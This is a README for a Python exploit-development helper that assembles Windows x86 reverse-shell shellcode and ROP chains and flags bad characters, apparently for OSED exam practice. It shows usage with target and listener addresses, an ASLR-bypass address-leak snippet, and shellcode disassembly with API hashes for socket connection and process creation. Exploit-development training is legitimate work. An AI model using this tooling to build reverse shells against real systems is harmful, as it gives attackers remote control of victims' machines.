This script combines ommadawn46's win-x86-shellcoder and the RopChain class from @Tan90909090's OSED blog post to automate the process of checking bad characters in ROP gadgets and shellcode.
This script uses Python3 ,Keystone-Engine and Capstone (tested with capstone-5.0.1-py3-none-win32.whl ) to assemble and disassemble Shellcode respectively.
./ -t <target_ip> -li <listener_ip> -lp <listener_port> [-d]
-t, --target
: Specifies the target IP address or hostname.-li, --ipaddress
: IP address where your listener is running (for reverse shell payloads).-lp, --port
: Listening port on which your listener is running.-d, --debug
: Inserts anint3
instruction in the shellcode for debugging purposes.
If the exploit requires you to leak base addresses to Bypass ASLR, uncomment:
function_addr = leak_BaseAddr()
baseAddr = parseAddr(function_addr) - 0x1e70
def C(rop_address):
" Converts preferred address of rop address to ASLR randomized address based on dllBase"
return (baseAddr + (rop_address - prefaddr))
Your RopChain should look something like this:
ropchain = RopChain(bad_chars)
ropchain.append(C(0x10154112)) # push esp ; inc ecx ; adc eax,
When you run the exploit, the script will alert you when bad characters are present in your shellcode/ropchain.
python -t -li -lp 4444
[ ] 50 : push eax
[x] 687f000001 : push 0x100007f
[ ] 66b8115c : mov ax, 0x5c11
[ ] c1e010 : shl eax, 0x10
Remember to update badchars
bad_chars = b"\x00"
If you're writing Shellcode that uses different Win32 APIs, make sure to change the loaded modules so the hash keys generated don't have bad characters.
hash_key = find_hash_key(
("KERNEL32.DLL", "LoadLibraryA"),
("WS2_32.DLL", "WSAStartup"),
("WS2_32.DLL", "WSASocketA"),
("WS2_32.DLL", "WSAConnect"),
("KERNEL32.DLL", "CreateProcessA"),
("KERNEL32.DLL", "TerminateProcess")
], bad_chars